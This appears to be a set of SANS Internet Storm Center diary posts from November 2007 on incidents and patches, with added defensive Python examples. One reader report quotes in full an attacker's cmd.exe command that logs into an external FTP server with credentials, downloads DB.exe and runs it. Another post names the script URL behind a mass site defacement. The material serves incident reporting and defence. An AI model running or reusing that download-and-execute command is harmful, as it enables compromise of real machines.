This whole cyber terrorism thing has always bothered me, especially since every time some nut decides that the "next attack" is going to be against an online target the press goes into hyper alert mode.  Folks, let's get serious about this for a few minutes.  I know that this is politically incorrect, but the odds of a terrorist group "terrorizing" the Internet with cyber bullets and e-bombs are about as small as the odds of the Morse Code coming back as a primary means of communication.  It's not zero, but it's also not much more than zero.  (Remember, math fans, that odds are a comparison expression such as 1:20 or 1:100 and can also be expressed as a real number by dividing the first value by the second.)  The terrorists use the Internet for the same thing everybody else does - communicating with each other.  They also use it to raise money through criminal activity, then launder it via one of the many electronic payment systems.  Ever look at the spam and phishing junk mail you receive?  It's not just the Russian Business Network operating in the shadows.  With the Internet providing near-perfect communications and a seemingly endless supply of money why would a terrorist group want to blow it up?

So for those looking for something to do while we remember our military veterans and fallen comrades in arms today (don't forget today is Armistice Day, also known as Veterans Day or Remembrance Day in several countries), think about how a terrorist group might actually go about terrorizing the Internet.  Send us your ideas and we'll publish them here.  The point is to learn from this exercise, to see what is possible and then to ask what we can do to prevent it or mitigate any consequences should it happen.

Thank You, Veterans, for your service to your country!

Marcus H. Sachs
Director, SANS Internet Storm Center

3 Comments

Published: 2007-11-10

"Malicious" Websites

We have often warned people against visiting unknown or suspicious websites because they could contain malicious content. Nowadays even visiting a well-known website can get you infected: it was reported that the India Times website contained hundreds of malicious files that could infect visitors.

http://www.theregister.co.uk/2007/11/10/india_times_under_attack/

Legitimate websites serving malicious content is nothing new; it has happened several times before. Web administrators must be prudent and make sure their websites are properly secured. Attackers are now clever enough not to deface your website, which would alert you, but rather to plant malicious content on it and wait for victims. Periodically running a vulnerability scan against your web systems is necessary to avoid known holes. Let us know if you have other good tips for web admins.

0 Comments

Published: 2007-11-10

WoW

Our reader Oscar shared with us that while he was playing World of Warcraft he suddenly lost control of his character and saw some "strange" lines appear (injected command strings displayed within his WoW session). Below is a screenshot.


He was also running a VNC server with an easily guessed password. These are the files he collected from the FTP server named in the injected command (see the update below for how):
* DB.exe
* NZ.EXE
* hirc.exe
* nc.exe
* PI.exe
* vnckiller.exe

If you have encountered similar experience, let us know.

Lesson learnt: if you expose any service to the Internet without proper protection you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks Oscar for sharing.

UPDATE

Oscar wrote back and gave us a detailed description of what happened.  Here is what he said:

So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.

So I was walking back out of the hearth spot, and my character started spinning around in circles, then my character said "aaaaaaaaa"

then, what looked like code was also spoken by my character: "%systemroot%\system32\cmd.exe" and then "/c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit". So, this seemed curious, since I wasn't even on a Windows platform, so I manually logged into the ftp server, did a mget * and thought the SANS folks would be interested in these files.

Now, how did they get in?  My guess here is that I had just installed the latest and greatest version of my favorite company's OS, and I turned on a feature called Screen Sharing, and also X'd the option to allow VNC users to log on with a password.  Well, the password I picked was pretty guessable.  When I logged into the previously mentioned ftp site, a program there was called vnckiller.exe, so I would assume that's how they got in.  Lesson for the Day: even if you're turning on a feature for testing purposes, don't choose an easy password, as most likely you'll forget to turn off this feature, and be rooted.  Thank goodness I wasn't

A question for our readers:  has anybody seen this happen to their session in WoW or any other virtual world simulation?
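The injected string is a standard FTP download cradle: each echo appends one line to a script file, ftp -s: replays that script, and the fetched binary is run at the end. The following Python is an added example (not part of the diary or of Oscar's report) that turns such a command line back into the indicators worth blocking or hunting for: the FTP host and port, the credentials, the files fetched, and what is executed afterwards. It handles the general echo/ftp -s: pattern rather than only this instance, and its only input is the string quoted above.

```python
import re
from dataclasses import dataclass, field

# The command string exactly as Oscar reported it in the diary entry above.
SAMPLE = (
    r"%systemroot%\system32\cmd.exe /c echo open ftpd.xbytez.com.ar 21 >> ik "
    r"&echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik "
    r"&echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit"
)


@dataclass
class FtpCradle:
    script_file: str                 # the temp file the FTP script is echoed into
    host: str = ""
    port: int = 21
    user: str = ""
    password: str = ""
    fetched: list = field(default_factory=list)   # arguments of get/mget lines
    executed: list = field(default_factory=list)  # commands run after the ftp step


def parse_ftp_cradle(cmdline):
    """Reconstruct what an 'echo ... >> file & ftp -s:file' cradle would do.

    Returns an FtpCradle with the indicators, or None if the command line
    does not use the 'ftp -s:<file>' pattern at all.
    """
    m = re.search(r"ftp\s+(?:-\w\s+)*-s:(\S+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    script = m.group(1).split("&")[0]          # tolerate '-s:ik&del' with no space
    cradle = FtpCradle(script_file=script)

    # Every 'echo <text> >> <script>' segment is one line of the FTP script, in
    # order, so replaying the echo arguments gives the script verbatim.
    echo_re = re.compile(r"echo\s+(.*?)\s*>>\s*" + re.escape(script) + r"(?=\s|&|$)")
    for line in echo_re.findall(cmdline):
        words = line.split()
        if not words:
            continue
        verb = words[0].lower()
        if verb == "open" and len(words) >= 2:
            cradle.host = words[1]
            if len(words) >= 3 and words[2].isdigit():
                cradle.port = int(words[2])
        elif verb == "user" and len(words) >= 2:
            cradle.user = words[1]
            if len(words) >= 3:
                cradle.password = words[2]
        elif verb in ("get", "mget") and len(words) >= 2:
            cradle.fetched.extend(words[1:])

    # Whatever follows the ftp invocation, split on '&', is the post-download
    # stage. Deleting the script file and 'exit' are housekeeping; the rest is
    # what actually runs (here the downloaded DB.exe).
    for segment in cmdline[m.end():].split("&"):
        segment = segment.strip()
        if not segment:
            continue
        if segment.split()[0].lower() in ("del", "exit"):
            continue
        cradle.executed.append(segment)
    return cradle


if __name__ == "__main__":
    print(parse_ftp_cradle(SAMPLE))
```

The host, port and credentials are what you block or search for in proxy and firewall logs; the executed list is what to look for on the disk of any machine that was exposed the same way.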

0 Comments

Published: 2007-11-09

Search engines that are no search engines

The DShield database was running a bit "hot" earlier today, so I took a closer look at the web log and found that one particular "search engine" was indexing the site rather aggressively:

a.b.c.d - - [09/Nov/2007:15:24:35 +0000] "GET /portreportascii.html?date=2007-11-09 HTTP/1.0" 200 500572 "-" "gsa-crawler (Enterprise; S5-FTNF3BWZPUJAS; nobody@google.com)" "-"

At first, I thought "oh well, it's Google". But looking at the user agent string more closely reveals some subtle differences. This is a Google Search Appliance, not the uber-google-bot we all love. The regular Googlebot looks like this:

66.249.65.233 - - [09/Nov/2007:15:24:37 +0000] "GET /date.html?port=47109&date=2007-10-25 HTTP/1.1" 200 7538 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

I have seen similar cases a few times now. While this one was not malicious, in some cases attackers used Google's (or another search engine's) user agent string. I can only assume this is an attempt to blend in, and maybe to retrieve the version of the page served to search engines. If anybody knows a good reference for the IP address ranges used by particular search engines: let us know.

(and btw... if you need bulk data access to dshield data: Please ask. Spidering the site is just not very efficient and you will run into some anti-harvesting traps sending you in circles)
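A user agent string proves nothing, since anyone can send it. The check Google documents for its own crawler is a reverse lookup of the client IP followed by a forward lookup of the resulting name: the name must end in googlebot.com or google.com and must resolve back to the same address. The Python below is an added example, not part of the diary: it parses combined-format log lines like the two above, flags requests that claim to be Googlebot, and runs that double lookup. Apart from the real Googlebot entry, the log lines are constructed, and so is the offline resolver at the end (its crawl-…googlebot.com name included), so the example runs without network access.

```python
import re
import socket

# Constructed log lines in the combined format of the diary's own two entries.
# 192.0.2.x is documentation address space, so lines two and three are samples.
LOG_LINES = [
    '66.249.65.233 - - [09/Nov/2007:15:24:37 +0000] "GET /date.html HTTP/1.1" 200 7538 '
    '"-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"',
    '192.0.2.10 - - [09/Nov/2007:15:24:35 +0000] "GET /portreportascii.html HTTP/1.0" 200 500572 '
    '"-" "gsa-crawler (Enterprise; S5-FTNF3BWZPUJAS; nobody@google.com)" "-"',
    '192.0.2.11 - - [09/Nov/2007:15:25:01 +0000] "GET /admin/ HTTP/1.1" 403 512 '
    '"-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return (client_ip, user_agent) from a combined-format log line, or None."""
    m = LOG_RE.match(line)
    return (m.group("ip"), m.group("ua")) if m else None


def verify_googlebot(ip, reverse=socket.gethostbyaddr, forward=socket.gethostbyname):
    """Google's published check: the PTR name must end in googlebot.com or
    google.com, and that name must resolve back to the same IP. The resolver
    functions are parameters so the check can run against canned data."""
    try:
        name = reverse(ip)[0]
    except OSError:            # socket.herror and gaierror are OSError subclasses
        return False
    if not name.lower().endswith((".googlebot.com", ".google.com")):
        return False
    try:
        return forward(name) == ip
    except OSError:
        return False


def triage(lines, reverse=socket.gethostbyaddr, forward=socket.gethostbyname):
    """Classify each request as verified Googlebot, an impersonator, or other."""
    out = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ua = parsed
        if "Googlebot" in ua:
            status = "verified" if verify_googlebot(ip, reverse, forward) else "IMPERSONATOR"
        else:
            status = "other"
        out.append((ip, status))
    return out


# Constructed offline resolver standing in for DNS. The PTR name follows the
# crawl-a-b-c-d.googlebot.com pattern Google uses, but is made up for this run.
_PTR = {"66.249.65.233": "crawl-66-249-65-233.googlebot.com"}
_A = {"crawl-66-249-65-233.googlebot.com": "66.249.65.233"}


def fake_reverse(ip):
    if ip not in _PTR:
        raise socket.herror(1, "Unknown host")
    return (_PTR[ip], [], [ip])


def fake_forward(name):
    if name not in _A:
        raise socket.gaierror(-2, "Name or service not known")
    return _A[name]


if __name__ == "__main__":
    for ip, status in triage(LOG_LINES, fake_reverse, fake_forward):
        print(ip, status)
```

Against live logs, call triage(lines) with the default resolvers; the forward lookup is what defeats an attacker who controls the reverse zone for their own address block.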

-----
Johannes B. Ullrich
Chief Research Officer, SANS Technology Institute

0 Comments

Published: 2007-11-09

yl18.net part II

As handlers we tend to have a tiny stubborn streak (no really, we do; just ask our respective partners, they'll confirm it).   So in the fine tradition of "I wonder what else is going on" I dug a little further. 

The more I looked the more familiar it seemed.  Remember the Super Bowl infection back in February?  Mass defacement using SQL injection, downloading a file (although almost everything does that nowadays), the script is #.js, etc.   It all sounded a bit the same.  So was there a link?

Seems there might be.   There are various sites that will show you which other sites are or were hosted on a particular IP address.  The address that yl18.net points to shows that the other web sites hosted on the same server are:

  • 137wg.com
  • Worldofwarcraftn.com
  • Zj5173.com

A quick Google search will show you that 137wg.com and Zj5173.com were used in the Super Bowl defacements.  The warcraft site might be legit, but so far it is three against one on that server. 

When you look at the title of the site 137wg.com you will find a reference to the newasp.com.cn domain (remember ANI?)

Following the yellow brick road on yl18.net  you end up adding to the counter hosted in the domain cnzz.com, strangely familiar from both the Super Bowl and ANI issues earlier this year.    So it would seem that there may be a link.

The good news so far is that the executable being downloaded seems to be detected by most AV products.  The sad news is that when I checked the other day the number of infected sites was about 30K and now about 52K sites.

If you use URL blockers in your organisation, then you may want to block the four domains and your users will be protected for at least the next little while.

Cheers

Mark  H - Shearwater

0 Comments

Published: 2007-11-08

Gone in 3600 seconds: story about TCP Keep-Alives

One of the things I’ve been working on recently included monitoring dropped sessions on an internal firewall. This firewall (along the others) is positioned between an application server and a database server. The firewall allows only incoming connections from ephemeral ports on the application server to port 1521 on the database server (that’s Oracle SQLNET). The following figure shows the setup:

Network architecture

The dropped packets log contained something interesting. From time to time, the firewall dropped some packets coming from the database servers, as shown below:

Dropped packets:

Source IP:Port           Destination IP:Port
============================================

10.0.1.24:1521           10.1.1.15:11925
10.0.1.24:1521           10.1.1.15:31578

This was pretty strange, as the database server should never open new connections, so I did some further research. I set up two sniffers, one on each side of the firewall, and analyzed the captured packets. That allowed me to reconstruct what happened here; the example below shows a session that starts at 10:00AM:

  • 10:00 – The application server connects to the database server, port 1521 (SQLNET). The connection is established from an ephemeral port, 31578. After a normal TCP three-way handshake the application server starts sending queries.
  • 11:00 – The application server sends the last query to the database server, which replies with results. The application server sends an empty ACK packet acknowledging that it received this packet.
  • 12:00 – One hour after the last packet was seen in the TCP session, the internal firewall's idle timeout causes it to delete the session from its stateful connection table. From now on any packet claiming to belong to this session will be dropped.
  • 13:00 – The database server sends an ACK packet to the application server. This is the TCP keep-alive mechanism described in RFC 1122: by default, after a session has been idle for 2 hours, the OS on the database server sends a probe (an ACK carrying no data) to see if the remote side is still up. If no answer is received it re-sends the probe a configurable number of times at OS-dependent intervals, and then drops the session.


So, the problem here was caused by the application server neither properly closing a session it no longer uses nor using TCP keep-alives itself. It was interesting to see that the application server used the session for exactly one hour.

To properly fix this we would have to work with the application server vendor to find out why it stops using connections without closing them. An easier fix was to increase the stateful connection table timeout on the firewall to 9000 seconds (2.5 hours), of course after carefully examining the impact on the firewall, since it will now hold state for idle sessions longer and use more memory. This allowed the keep-alive ACK packets sent by the database server through the firewall, and the application server correctly replied to them.
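To see the two timers interact, the following Python is an added example, not part of the diary. It replays the idle session above against a firewall state table with a configurable timeout, showing that with a 3600 s timeout every keep-alive probe arrives after the session has been forgotten while a 9000 s timeout lets the first probe through, and it shows how to switch keep-alives on from the application side so the first probe precedes the firewall timeout. The 75 s probe interval and 9 probes are the Linux defaults and my assumption; the per-socket timer options are Linux-specific and are skipped on platforms that lack them.

```python
import socket

# Timers from the diary: last data packet at 11:00 (3600 s into the session),
# firewall idle timeout 3600 s, first keep-alive after 7200 s idle (the RFC 1122
# default). Interval 75 s and 9 probes are the Linux defaults (my assumption;
# the database host's OS may differ).
LAST_DATA_S = 3600
FW_TIMEOUT_S = 3600
KEEPALIVE_IDLE_S = 7200
KEEPALIVE_INTVL_S = 75
KEEPALIVE_PROBES = 9


def session_timeline(last_data_s, fw_timeout_s, ka_idle_s, ka_intvl_s, ka_probes):
    """Replay one idle session through a stateful firewall.

    Returns (time_s, event, verdict) tuples. A probe is 'forwarded' if the
    firewall still holds the session when it arrives, otherwise 'DROPPED'.
    """
    forget_at = last_data_s + fw_timeout_s
    events = [(forget_at, "firewall expires session", "-")]
    t = last_data_s + ka_idle_s
    for n in range(1, ka_probes + 1):
        verdict = "forwarded" if t < forget_at else "DROPPED"
        events.append((t, "keep-alive probe %d from db server" % n, verdict))
        if verdict == "forwarded":
            break          # the app server answers and the session stays alive
        t += ka_intvl_s    # unanswered: the server re-probes after the interval
    return sorted(events)


def probes_survive(fw_timeout_s, ka_idle_s):
    """The one inequality that matters: the first probe must precede the firewall timeout."""
    return ka_idle_s < fw_timeout_s


def enable_keepalive(sock, idle_s, intvl_s, probes):
    """Turn on keep-alives on an application-side socket and, where the platform
    exposes per-socket timers (TCP_KEEPIDLE/TCP_KEEPINTVL/TCP_KEEPCNT on Linux),
    set them so the first probe goes out well before the firewall forgets the
    flow. Returns True if SO_KEEPALIVE is now set."""
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    for name, value in (("TCP_KEEPIDLE", idle_s),
                        ("TCP_KEEPINTVL", intvl_s),
                        ("TCP_KEEPCNT", probes)):
        opt = getattr(socket, name, None)   # absent where per-socket timers are not supported
        if opt is not None:
            sock.setsockopt(socket.IPPROTO_TCP, opt, value)
    return sock.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE) != 0


if __name__ == "__main__":
    for fw in (FW_TIMEOUT_S, 9000):
        print("firewall idle timeout %d s:" % fw)
        for t, event, verdict in session_timeline(LAST_DATA_S, fw, KEEPALIVE_IDLE_S,
                                                  KEEPALIVE_INTVL_S, KEEPALIVE_PROBES):
            print("  t=%6d s  %-36s %s" % (t, event, verdict))
```

Raising the firewall timeout is the quick fix described above; the durable one is enable_keepalive() on the application's own connections with an idle time below the firewall's, which also makes the application notice a dead peer instead of holding the connection forever.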

Why all this you might ask? This was one example of why we should spend time cleaning our local networks as well. During this exercise we found heaps of incorrectly configured servers and/or applications that people lived with for ages, without even knowing what’s going on on the network (low) layer.

--

Bojan

 

1 Comments

Published: 2007-11-06

yl18.net mass defacement

Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40 000 pages across the internet:

script src="hXXp://yl 18.net/0.js"

This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.

Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti virus coverage differed greatly between several binaries. Below is the virustotal output for one sample:

AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 7.6.0.30 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 7.5.0.503 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 7.0.15.0 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T3.1.1.12 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 7.0.0.125 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 9.0.0.4 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 20.17.12.00 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 6.2.9.117 2007.11.06 -
VBA32 3.12.2.4 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul 

This type of widespread attack can incur a serious toll and requires follow up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:

  • Inform the ISP hosting the malicious code. In this case this was CHINANET, which has a massive installed base and is not always able to respond promptly;
  • If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
  • We gather samples of the affected malicious code and distribute it to anti virus vendors to have them build coverage;
  • If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.

We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.

As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.

This is a problem – most registrars do not really care what a domain is used for. Generally malicious domains are however paid for with fake credit cards, and if this can be identified, they have the legal ability to disable the domain.

These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross site scripting, and are infecting their users.

If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.
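Two things mark this injection in a page: a script tag pulling from the malicious domain, and iframes that would never render visibly. The Python below is an added example, not part of the diary: it scans HTML for external scripts from a blocklist and for zero-sized or display:none iframes, so a webmaster can check their own pages for the injected tag and the hidden frames it produces. The sample page is constructed for the example; the yl18.net URL in it is the diary's defanged one written out again, and the other hosts are documentation addresses.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

BLOCKED_DOMAINS = {"yl18.net"}   # from this diary; extend with your own blocklist

# Constructed page: one legitimate script, the injected yl18.net tag, two iframes
# that would never be visible, and one ordinary iframe that should not be flagged.
SAMPLE_HTML = """<html><head><title>Catalogue</title>
<script src="/js/site.js"></script>
<script src="http://yl18.net/0.js"></script>
</head><body>
<p>Welcome back.</p>
<iframe src="http://203.0.113.5/e.htm" width="0" height="0"></iframe>
<iframe src="http://203.0.113.6/w.htm" width="300" height="200" style="display: none"></iframe>
<iframe src="http://partner.example/widget" width="300" height="200"></iframe>
</body></html>"""


class InjectionScanner(HTMLParser):
    """Flags external scripts from blocked domains and iframes that are hidden
    (zero-sized or display:none), the two markers of this mass injection."""

    def __init__(self, blocked):
        super().__init__()
        self.blocked = {d.lower() for d in blocked}
        self.findings = []

    def _is_blocked(self, host):
        return any(host == d or host.endswith("." + d) for d in self.blocked)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}   # valueless attrs come back as None
        src = a.get("src", "").strip()
        if not src:
            return
        host = (urlparse(src).hostname or "").lower()  # "" for relative URLs
        if tag == "script" and self._is_blocked(host):
            self.findings.append(("blocked-script", src))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = a.get("width") == "0" or a.get("height") == "0" or "display:none" in style
            if hidden or self._is_blocked(host):
                self.findings.append(("hidden-iframe", src))


def scan_html(html, blocked=BLOCKED_DOMAINS):
    """Return [(kind, src), ...] for every suspicious tag, in document order."""
    scanner = InjectionScanner(blocked)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_HTML):
        print(kind, src)
```

Run it over the rendered output of your pages rather than the templates: the injected tag lives in the database content that SQL injection reached, not in the files on disk.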

--
Maarten Van Horenbeeck

3 Comments

Published: 2007-11-06

Quicktime 7.3 patches serious security bugs

Apple has released Quicktime 7.3 which contains fixes for a number of serious vulnerabilities:

  • A memory corruption bug which can be triggered by a maliciously crafted movie. It could potentially result in arbitrary code execution (CVE-2007-2395).
  • A heap overflow in the use of Sample Table Sample Descriptor atoms, which can be triggered through maliciously crafted movie files. It could potentially result in arbitrary code execution (CVE-2007-3750).
  • Vulnerabilities in Quicktime for Java which could allow untrusted applets to obtain elevated privileges (CVE-2007-3751).
  • Two bugs in PICT file processing, potentially resulting in arbitrary code execution (CVE-2007-4672).
  • A bug in QTVR movie file parsing which could result in arbitrary code execution (CVE-2007-4675).
  • A bug in the parsing of color table atoms which could result in arbitrary code execution (CVE-2007-4677).

The impact of each bug varies based on the platform, but all of Mac OS X, Vista and XP SP2 are affected. Get more information at Apple.

5 Comments

Published: 2007-11-06

Windows XP and 2003 local privilege escalation vulnerability

Microsoft has an advisory and a blog entry up on a new vulnerability, CVE-2007-5587, in the Macrovision SECDRV.SYS driver. This file is included with Windows XP and Windows Server 2003.

It appears partial information on the vulnerability and exploit has been in the wild since mid October, and it is being exploited in a limited number of incidents.

According to the advisory, this is a local attack which allows privilege escalation. While plans for an official Microsoft supplied patch are in the works, Macrovision has released an update from their website which allows you to mitigate this issue.

--
Maarten Van Horenbeeck

1 Comments

Published: 2007-11-05

Cyber Jihad Called Off

Ok. Not really. But a lot of what you read may just be hype. Over the last couple of days quite a few readers asked us for our opinion on the "cyber jihad" that is supposed to start on November 11th. A couple of reasons why we think this is not going to be an issue:

  • the site calling for it has tried to do so before without success
  • November 11th is also the official start of carnival, at least in Germany, and a day for hoaxes
  • even if something does happen, I doubt it will be more than a lame DoS attack
So in short: stay calm, focus on best practices and you don't have to do anything special on November 11th. If your systems are secure, they will be fine. If they are not secure, they will get hacked whether it's a cyber jihad or the script kiddie from next door.

In the past, political attacks like this resulted in some more or less manual DoS attacks. Expect things like calls for supporters to reload particular "offensive" websites, or use the ping command to flood them. In some cases, supporters may be asked to install trojans. But chances are that the usual criminals will just take advantage of this and use it as a trick to install the regular criminal bots.

-----------
Johannes B. Ullrich, Ph.D.
Chief Research Officer, SANS Technology Institute.

4 Comments

Published: 2007-11-05

Top IPv6 Implementation Issues

Have you implemented IPv6 yet? Are you considering it or testing it right now? I am working on a list of the top IPv6 implementation issues, and would like to hear what problems you ran into. Please use our contact form and mention "IPv6" as part of the subject.

A complete list will be presented at the CDI conference in December and we will post it here after the conference.

-------------
Johannes B. Ullrich, Ph.D.
Chief Research Officer, SANS Technology Institute

0 Comments

Published: 2007-11-04

Daylight Saving Time Reminder for North America (with some exceptions)

A last minute reminder that in some regions (including the United States, Canada, the Bahamas, Bermuda, and the French territory of Saint Pierre and Miquelon, and likely others that I have missed) the clocks will be set back.  See Marc's entry from last week for more details.

Be sure to check your appliances, unpatched computers and PDAs.  It's also a good time to change the batteries in your fire/smoke alarms.

0 Comments

Published: 2007-11-02

root nameserver migration

DNS name servers that don't forward their requests to other DNS servers need to know the IP addresses of at least some of the root name servers in order to find their way to the rest of the information. They either have this knowledge built in or read it from an external file (the root hints) containing the initial mapping.

The "L.ROOT-SERVERS.NET" root name server changed its IP address, and hence some updating to the hints could be useful.

For the record: this isn't an urgent update. Consider it an opportunity to verify your name server software is up to date on patches and perhaps to learn a few interesting bits on how the DNS system works.
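A root hints update is a comparison of two small zone-format files. The Python below is an added example, not part of the diary: it parses named.root-style hints and reports which root servers were added, removed or renumbered between the copy on a server and a freshly fetched one. The two excerpts are constructed; the L-root addresses in them are the pre- and post-migration ones as I recall them and should be verified against the named.root file published by InterNIC, not taken from this example.

```python
# Constructed excerpts in named.root syntax (';' starts a comment). Only A and
# L are listed to keep the example short; a real hints file names all 13.
# The L addresses are the old and new ones as I remember them; verify them
# against the official named.root before relying on them.
STALE_HINTS = """\
;   constructed excerpt, not a complete hints file
.                        3600000      NS    A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET.      3600000      A     198.41.0.4
.                        3600000      NS    L.ROOT-SERVERS.NET.
L.ROOT-SERVERS.NET.      3600000      A     198.32.64.12
"""

CURRENT_HINTS = """\
;   constructed excerpt, not a complete hints file
.                        3600000      NS    A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET.      3600000      A     198.41.0.4
.                        3600000      NS    L.ROOT-SERVERS.NET.
L.ROOT-SERVERS.NET.      3600000      A     199.7.83.42
"""


def parse_hints(text):
    """Return (set of root NS names, {name: set of glue addresses})."""
    ns, glue = set(), {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 4:
            continue
        # Class may or may not be present, so take type and rdata from the end.
        owner, rtype, rdata = parts[0].upper(), parts[-2].upper(), parts[-1]
        if owner == "." and rtype == "NS":
            ns.add(rdata.upper())
        elif rtype in ("A", "AAAA"):
            glue.setdefault(owner, set()).add(rdata.lower())
    return ns, glue


def diff_hints(stale_text, current_text):
    """List (change, server, current_addresses) for every root server that differs."""
    ns_s, glue_s = parse_hints(stale_text)
    ns_c, glue_c = parse_hints(current_text)
    report = []
    for name in sorted(ns_s | ns_c):
        if name not in ns_s:
            report.append(("added", name, sorted(glue_c.get(name, ()))))
        elif name not in ns_c:
            report.append(("removed", name, sorted(glue_s.get(name, ()))))
        elif glue_s.get(name) != glue_c.get(name):
            report.append(("changed", name, sorted(glue_c.get(name, ()))))
    return report


if __name__ == "__main__":
    for change, server, addrs in diff_hints(STALE_HINTS, CURRENT_HINTS):
        print(change, server, ", ".join(addrs))
```

Feed it the hints file your name server actually loads and a copy you have just downloaded; an empty report means there is nothing to do, which is the expected answer most of the time.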

--
Swa Frantzen

0 Comments

Published: 2007-11-02

Symantec local privilege escalation (Mac products)

A local privilege escalation problem in a security product like anti-virus software typically sets off quite a few alarms with security people, as the software is installed to make machines more secure, not less.

Mac versions of Symantec's anti-virus software have a local privilege escalation problem. It allows members of the admin group to gain "root" powers.

Still, members of the admin group can use sudo to get a local shell with root powers anyway, hence we're not likely to lose much sleep over this one. That is, until it gets automated in a second-stage exploit.

See http://securityresponse.symantec.com/avcenter/security/Content/2007.11.02.html

--
Swa Frantzen

0 Comments

Published: 2007-11-02

Firefox 2.0.0.9 update

The expected stability update to Firefox is out.

It fixes some known problems in version 2.0.0.8, but nothing flagged as security related.

Funny, stability seems to be treated much like availability. Probably proof that quite a few still don't consider availability an integral part of security ...

--
Swa Frantzen

0 Comments

Published: 2007-11-01

Digital cartographers

Mankind has always had a desperate need to understand its environment. Only by studying our surroundings have we been able to make the changes that help us live better. This is also true of the virtual world we ourselves created.

Complicating matters though, there are multiple parallel maps which essentially cover the same infrastructure, but from different points of view. There are network diagrams, huge maps of the internet and those showing how individual cities interconnect.

At another layer, there are now maps that try to chart how people interrelate – social networks, as we call them. Other maps identify how suspected criminal networks operate or how they structure domains used in specific attacks.

One major issue with maps is that we tend to consider them accurate. When we use maps in our daily lives, they generally show us the way from point A to point B, and they are always right. This is because of a fundamental feedback loop. When I cross from point A to point B, others have likely crossed from point C to point D while meeting the same road. If the map is inaccurate, errors get reported and fixed very smoothly. There’s a lot of traffic, after all.

Our network maps, however, compare much better to those built hundreds of years ago. They were created by a single person visiting a new region or continent, and contained errors. From 1605 to 1722, for example, California was regularly drawn on maps as an island.

In addition, maps are often used to sell beliefs. They aren’t necessarily wrong, they just present the world as it exists in the cartographer’s mind. Try grabbing maps of the Spratly Islands from various East Asian countries, or maps of the Middle East from Israel and Syria.

